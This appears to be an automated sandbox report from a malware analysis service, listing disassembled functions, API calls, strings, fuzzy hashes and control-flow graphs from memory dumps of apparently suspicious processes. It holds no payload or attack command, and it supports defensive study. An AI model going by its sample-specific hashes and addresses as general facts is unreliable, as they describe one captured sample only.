                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                • Instruction ID: a763c13f3b3fd35034b132962ff3374e776d745f69dc8f709e6041be80a6c6d0
                                                • Opcode Fuzzy Hash: 07fd6551abb1b23bdd703d42bb525ad9c2c93912454aa8d30b07c03c3ebf2885
                                                • Instruction Fuzzy Hash: DF510575A00645EECFA0DF6CC89087FFBFAEB44304B148469F996C7642DAB4EB448760
                                                Function 017D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01814725
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018146FC
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01814742
                                                • ExecuteOptions, xrefs: 018146A0
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01814787
                                                • Execute=1, xrefs: 01814713
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01814655
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                • Instruction ID: 7b097f368ebb665cb93e43f7e2a5e02edfaeee40870442d8fb6aaa1af2cbc58e
                                                • Opcode Fuzzy Hash: d9053459f726d969c1ecdd4d86f88cd5993695646784ec9b47f766d00cfd3129
                                                • Instruction Fuzzy Hash: FE51397164021DBAEF15EBA8DC99FA9B7B8EF18318F1404D9D605E7181E7709B41CF50
                                                Function 01876940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction ID: 035c33667546b0cb5c0e5d686ce22a2aba84dc7f12d5ed27a303e6440dca5545
                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction Fuzzy Hash: E1023771508742AFE305CF18C494A6BBBE5FFD8704F148A2DF9858B264EB31EA45CB52
                                                Function 017EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction ID: 5270ccefbae1948bd2d263e772e859e8675d989e5a3d3594791f77230a13a856
                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction Fuzzy Hash: 2A81D070E852498EEF298E6CC8997FEFFF1AF8D320F18415AD951A7691C7309840CB91
                                                Function 018520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                • Instruction ID: 5f8c094f46e201fff233735c4c5095c2ec6402a8c7d989dc82a29ca6ffb1e091
                                                • Opcode Fuzzy Hash: 2a93d09bfea64d828be8f8f5ad3e06fae6dc4f61383c16ab4d17b8b138a193c6
                                                • Instruction Fuzzy Hash: 5421567AA00519ABDB50DE79DC449BFBBEAEF54744F040115ED05D3205EB30EA058B91
                                                Function 017CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 0181031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018102BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018102E7
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                • Instruction ID: e3e343046a924aa3b60de1bb6b10601b9353a372f1a57e35a2a5bc4bbf46d1a4
                                                • Opcode Fuzzy Hash: 7e1f11bba32a0aa656bf8a0dd8bf5fc07c33896e38171119382948c2381d8f1a
                                                • Instruction Fuzzy Hash: 42E1BE316047419FD726CF28C884B6AFBE5BB88B14F140A6DF5A5CB2E1D774DA84CB42
                                                Function 017DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01817B7F
                                                • RTL: Re-Waiting, xrefs: 01817BAC
                                                • RTL: Resource at %p, xrefs: 01817B8E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                • Instruction ID: 0c44c4e4401baebd21901e1e060307798cb64001b3176ca05d04c2b1631c635e
                                                • Opcode Fuzzy Hash: ac6b8687aff72526df4f328deb582478113900551d9526e7ad79afc4b6190ef3
                                                • Instruction Fuzzy Hash: F541E3313047069FDB21DE29C840B6AF7F5EF9A720F100A6DFA5AD7280DB31E5458B91
                                                Function 017DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181728C
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 018172C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01817294
                                                • RTL: Resource at %p, xrefs: 018172A3
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                • Instruction ID: c56a07a522e8e8623b692b004a18d2d4df4dfdb996fda41b1463ec5fa351dc4b
                                                • Opcode Fuzzy Hash: fbd12a72b931ab109e5a1d1667b28c6575924fc26cbf5c374424268c1c7c4811
                                                • Instruction Fuzzy Hash: 6941F032600206ABDB21DE29CC41FA6F7B9FB99710F24061DFA56EB240DB20E942C7D1
                                                Function 01852300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                • Instruction ID: fce7c2ad759cbcab1371941371187a9fa2a4f8b2db4846993e0435e5ebae4259
                                                • Opcode Fuzzy Hash: 096d43808c39ec470322d3024f4e62b4412deb20f2133a039427990fc5784993
                                                • Instruction Fuzzy Hash: D8318772A00119DFDB60DE2DDC44BEEB7F9EB44710F440559ED49D3201EF309A488B60
                                                Function 017E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction ID: c8b77c1f8d1381a3d17b5fb2968951b1e143b6e20e17d43ae3621f895eeb25da
                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction Fuzzy Hash: 9791A271E002169BEB28DF6DC889ABEFBE5FF4C320F54451AE955E72C4E73089818791
                                                Function 017A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                • Instruction ID: 7e5972e44cdd7518fcaa101ebe1deca91af4f53c9fa707221903119987c2c69d
                                                • Opcode Fuzzy Hash: 62bcec01cf40b6d5309fdef71a45226ea49ef5667ee0ab4687e4e71801a76f57
                                                • Instruction Fuzzy Hash: E6812D71D012699BDB76CF54CC49BEEB7B4AB48714F0041EAEA19B7280E7705E84CFA0

                                                Execution Graph

                                                Execution Coverage:6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:90
                                                Total number of Limit Nodes:8
                                                execution_graph 18279 b0d690 DuplicateHandle 18280 b0d726 18279->18280 18292 b0d040 18293 b0d086 GetCurrentProcess 18292->18293 18295 b0d0d1 18293->18295 18296 b0d0d8 GetCurrentThread 18293->18296 18295->18296 18297 b0d115 GetCurrentProcess 18296->18297 18298 b0d10e 18296->18298 18299 b0d14b 18297->18299 18298->18297 18300 b0d173 GetCurrentThreadId 18299->18300 18301 b0d1a4 18300->18301 18281 70f13a8 18282 70f1533 18281->18282 18283 70f13ce 18281->18283 18283->18282 18286 70f1628 PostMessageW 18283->18286 18288 70f1621 18283->18288 18287 70f1694 18286->18287 18287->18283 18289 70f1628 PostMessageW 18288->18289 18290 70f1624 18288->18290 18291 70f1694 18289->18291 18290->18289 18291->18283 18302 b04668 18303 b0467a 18302->18303 18304 b04686 18303->18304 18308 b04779 18303->18308 18313 b03e34 18304->18313 18306 b046a5 18309 b0479d 18308->18309 18317 b04888 18309->18317 18321 b04879 18309->18321 18314 b03e3f 18313->18314 18329 b05c44 18314->18329 18316 b07048 18316->18306 18319 b048af 18317->18319 18318 b0498c 18319->18318 18325 b044b4 18319->18325 18323 b04888 18321->18323 18322 b0498c 18322->18322 18323->18322 18324 b044b4 CreateActCtxA 18323->18324 18324->18322 18326 b05918 CreateActCtxA 18325->18326 18328 b059db 18326->18328 18330 b05c4f 18329->18330 18333 b05c64 18330->18333 18332 b070ed 18332->18316 18334 b05c6f 18333->18334 18337 b05c94 18334->18337 18336 b071c2 18336->18332 18338 b05c9f 18337->18338 18341 b05cc4 18338->18341 18340 b072c5 18340->18336 18342 b05ccf 18341->18342 18344 b085cb 18342->18344 18347 b0ac79 18342->18347 18343 b08609 18343->18340 18344->18343 18351 b0cd68 18344->18351 18356 b0acb0 18347->18356 18359 b0aca0 18347->18359 18348 b0ac8e 18348->18344 18352 b0cd1b 18351->18352 18353 b0cd6e 18351->18353 18352->18343 18354 b0cdbd 18353->18354 18383 b0cf28 18353->18383 18354->18343 18363 b0ada8 18356->18363 18357 b0acbf 18357->18348 18360 b0acb0 18359->18360 18362 b0ada8 2 API calls 18360->18362 18361 b0acbf 18361->18348 18362->18361 18364 b0adb9 18363->18364 18365 b0addc 18363->18365 18364->18365 18371 b0b040 18364->18371 18375 b0b031 18364->18375 18365->18357 18366 b0afe0 GetModuleHandleW 18368 b0b00d 18366->18368 18367 b0add4 18367->18365 18367->18366 18368->18357 18372 b0b054 18371->18372 18374 b0b079 18372->18374 18379 b0a130 18372->18379 18374->18367 18376 b0b040 18375->18376 18377 b0a130 LoadLibraryExW 18376->18377 18378 b0b079 18376->18378 18377->18378 18378->18367 18380 b0b220 LoadLibraryExW 18379->18380 18382 b0b299 18380->18382 18382->18374 18384 b0cf35 18383->18384 18385 b0cf6f 18384->18385 18387 b0bae0 18384->18387 18385->18354 18388 b0bae5 18387->18388 18390 b0dc88 18388->18390 18391 b0d2dc 18388->18391 18390->18390 18392 b0d2e7 18391->18392 18393 b05cc4 2 API calls 18392->18393 18394 b0dcf7 18393->18394 18394->18390

                                                Executed Functions

                                                Function 00B0D031 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 504 b0d031-b0d0cf GetCurrentProcess 508 b0d0d1-b0d0d7 504->508 509 b0d0d8-b0d10c GetCurrentThread 504->509 508->509 510 b0d115-b0d149 GetCurrentProcess 509->510 511 b0d10e-b0d114 509->511 513 b0d152-b0d16d call b0d618 510->513 514 b0d14b-b0d151 510->514 511->510 517 b0d173-b0d1a2 GetCurrentThreadId 513->517 514->513 518 b0d1a4-b0d1aa 517->518 519 b0d1ab-b0d20d 517->519 518->519
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00B0D0BE
                                                • GetCurrentThread.KERNEL32 ref: 00B0D0FB
                                                • GetCurrentProcess.KERNEL32 ref: 00B0D138
                                                • GetCurrentThreadId.KERNEL32 ref: 00B0D191
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: c63d47f729a7eeec6d6d7b0c0aa968e708a056402677c08c3debde51e71e2c6f
                                                • Instruction ID: 666b0356d22ab5cfdc0951285c5406b765c86f3e54fb27bf7db4b51b39866956
                                                • Opcode Fuzzy Hash: c63d47f729a7eeec6d6d7b0c0aa968e708a056402677c08c3debde51e71e2c6f
                                                • Instruction Fuzzy Hash: 325146B09003498FDB14DFA9D548B9EBFF1AF89304F20846AE019B73A0DB759984CB65
                                                Function 00B0D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 526 b0d040-b0d0cf GetCurrentProcess 530 b0d0d1-b0d0d7 526->530 531 b0d0d8-b0d10c GetCurrentThread 526->531 530->531 532 b0d115-b0d149 GetCurrentProcess 531->532 533 b0d10e-b0d114 531->533 535 b0d152-b0d16d call b0d618 532->535 536 b0d14b-b0d151 532->536 533->532 539 b0d173-b0d1a2 GetCurrentThreadId 535->539 536->535 540 b0d1a4-b0d1aa 539->540 541 b0d1ab-b0d20d 539->541 540->541
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 00B0D0BE
                                                • GetCurrentThread.KERNEL32 ref: 00B0D0FB
                                                • GetCurrentProcess.KERNEL32 ref: 00B0D138
                                                • GetCurrentThreadId.KERNEL32 ref: 00B0D191
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 676be0d87901e37a6db6d5a780cc0e5f223428507e5d43ffcc0b26f746c66e39
                                                • Instruction ID: e0841c094e9137dd5e18cc66ae59f8938c3444d01f4bdd4b5ec67495bc33ee95
                                                • Opcode Fuzzy Hash: 676be0d87901e37a6db6d5a780cc0e5f223428507e5d43ffcc0b26f746c66e39
                                                • Instruction Fuzzy Hash: E75134B09003098FDB14DFA9D948B9EBFF1EF89314F208469E419A73A0DB759984CB65
                                                Function 00B0ADA8 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 572 b0ada8-b0adb7 573 b0ade3-b0ade7 572->573 574 b0adb9-b0adc6 call b0a0cc 572->574 576 b0ade9-b0adf3 573->576 577 b0adfb-b0ae3c 573->577 580 b0adc8 574->580 581 b0addc 574->581 576->577 583 b0ae49-b0ae57 577->583 584 b0ae3e-b0ae46 577->584 629 b0adce call b0b040 580->629 630 b0adce call b0b031 580->630 581->573 585 b0ae59-b0ae5e 583->585 586 b0ae7b-b0ae7d 583->586 584->583 588 b0ae60-b0ae67 call b0a0d8 585->588 589 b0ae69 585->589 591 b0ae80-b0ae87 586->591 587 b0add4-b0add6 587->581 590 b0af18-b0af94 587->590 593 b0ae6b-b0ae79 588->593 589->593 622 b0afc0-b0afd8 590->622 623 b0af96-b0afbe 590->623 594 b0ae94-b0ae9b 591->594 595 b0ae89-b0ae91 591->595 593->591 598 b0aea8-b0aeaa call b0a0e8 594->598 599 b0ae9d-b0aea5 594->599 595->594 601 b0aeaf-b0aeb1 598->601 599->598 603 b0aeb3-b0aebb 601->603 604 b0aebe-b0aec3 601->604 603->604 605 b0aee1-b0aeee 604->605 606 b0aec5-b0aecc 604->606 613 b0aef0-b0af0e 605->613 614 b0af11-b0af17 605->614 606->605 608 b0aece-b0aede call b0a0f8 call b0a108 606->608 608->605 613->614 624 b0afe0-b0b00b GetModuleHandleW 622->624 625 b0afda-b0afdd 622->625 623->622 626 b0b014-b0b028 624->626 627 b0b00d-b0b013 624->627 625->624 627->626 629->587 630->587
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0AFFE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 70dec4425ce96781c0720d53a862fe1099d1d2ba64de2e432ec906965d7e4dae
                                                • Instruction ID: 16148a5a68c60a0d9b55217bc7c27891eb01bd94427a13fbeffb3d9754b41ddd
                                                • Opcode Fuzzy Hash: 70dec4425ce96781c0720d53a862fe1099d1d2ba64de2e432ec906965d7e4dae
                                                • Instruction Fuzzy Hash: 0C814670A00B058FDB24DF29D44179ABBF1FF88304F108A6DD08AD7A91E775E84ACB91
                                                Function 00B0590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 631 b0590c-b05916 632 b05918-b059d9 CreateActCtxA 631->632 634 b059e2-b05a3c 632->634 635 b059db-b059e1 632->635 642 b05a4b-b05a4f 634->642 643 b05a3e-b05a41 634->643 635->634 644 b05a60 642->644 645 b05a51-b05a5d 642->645 643->642 647 b05a61 644->647 645->644 647->647
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00B059C9
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: c9424ea0264cc99c789a3769113b8c7063e1793446880dd21f125673157e065d
                                                • Instruction ID: 9e0da638e20eb22e1faa40de58b218828e2c4b71759c3d4375460f2ac1006c41
                                                • Opcode Fuzzy Hash: c9424ea0264cc99c789a3769113b8c7063e1793446880dd21f125673157e065d
                                                • Instruction Fuzzy Hash: 9B41E1B0D00619CFDB24CFA9C8846CEBBF5BF49304F2480AAD418AB295DB756985CF90
                                                Function 00B044B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 648 b044b4-b059d9 CreateActCtxA 651 b059e2-b05a3c 648->651 652 b059db-b059e1 648->652 659 b05a4b-b05a4f 651->659 660 b05a3e-b05a41 651->660 652->651 661 b05a60 659->661 662 b05a51-b05a5d 659->662 660->659 664 b05a61 661->664 662->661 664->664
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00B059C9
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ee20a770010ba97838ff3d34b5db5bcfdbf3a4c17d5533d6b24189fbc071de59
                                                • Instruction ID: 46d39f2f82371597baedc08f5e9a68d951f4938d0bfa00ea4332214b8a849385
                                                • Opcode Fuzzy Hash: ee20a770010ba97838ff3d34b5db5bcfdbf3a4c17d5533d6b24189fbc071de59
                                                • Instruction Fuzzy Hash: 7241B2B0D0061DCFDB24DFA9C88469EBBF5BF48304F2481AAE418AB255DB756945CF90
                                                Function 00B0D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 665 b0d689-b0d724 DuplicateHandle 666 b0d726-b0d72c 665->666 667 b0d72d-b0d74a 665->667 666->667
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B0D717
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 94856884539b98c27bf5396ee4b777ea0b7c21f282d60e53ef6068c5f87c0dcb
                                                • Instruction ID: d3b9c8799886216313c0a656a87db5c47f9d6af96d60cc6c5436c11b2dd61035
                                                • Opcode Fuzzy Hash: 94856884539b98c27bf5396ee4b777ea0b7c21f282d60e53ef6068c5f87c0dcb
                                                • Instruction Fuzzy Hash: FF21E4B59002599FDB10CFAAD584AEEBFF4EB48324F24846AE954B3350D374A944CF60
                                                Function 00B0D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 670 b0d690-b0d724 DuplicateHandle 671 b0d726-b0d72c 670->671 672 b0d72d-b0d74a 670->672 671->672
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B0D717
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: e2f3d7a4bb7e913d3e3d443626c288d6593daa44a90fb50ada5964b273b215a5
                                                • Instruction ID: 93cd30230437be59379c2dcc33c789197c35db0ab404a99105a814fbbd4dfca0
                                                • Opcode Fuzzy Hash: e2f3d7a4bb7e913d3e3d443626c288d6593daa44a90fb50ada5964b273b215a5
                                                • Instruction Fuzzy Hash: 6721E2B59002489FDB10CFAAD984ADEBFF8EB48320F14801AE958A3350D374A940CFA4
                                                Function 00B0A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 675 b0a130-b0b260 677 b0b262-b0b265 675->677 678 b0b268-b0b297 LoadLibraryExW 675->678 677->678 679 b0b2a0-b0b2bd 678->679 680 b0b299-b0b29f 678->680 680->679
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0B079,00000800,00000000,00000000), ref: 00B0B28A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: a704e0872945e6edd945a61ef59470313f2e5b7fd6b4123286ef3c8262594b4f
                                                • Instruction ID: fefabfabc5a9971fb860ad23752ac6729cbbd835424d1785018c089bc5e31422
                                                • Opcode Fuzzy Hash: a704e0872945e6edd945a61ef59470313f2e5b7fd6b4123286ef3c8262594b4f
                                                • Instruction Fuzzy Hash: BA11E2B69002099FDB20CF9AD444ADEFFF4EB88320F10846AE559A7250C375A945CFA5
                                                Function 00B0B218 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 683 b0b218-b0b260 684 b0b262-b0b265 683->684 685 b0b268-b0b297 LoadLibraryExW 683->685 684->685 686 b0b2a0-b0b2bd 685->686 687 b0b299-b0b29f 685->687 687->686
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0B079,00000800,00000000,00000000), ref: 00B0B28A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
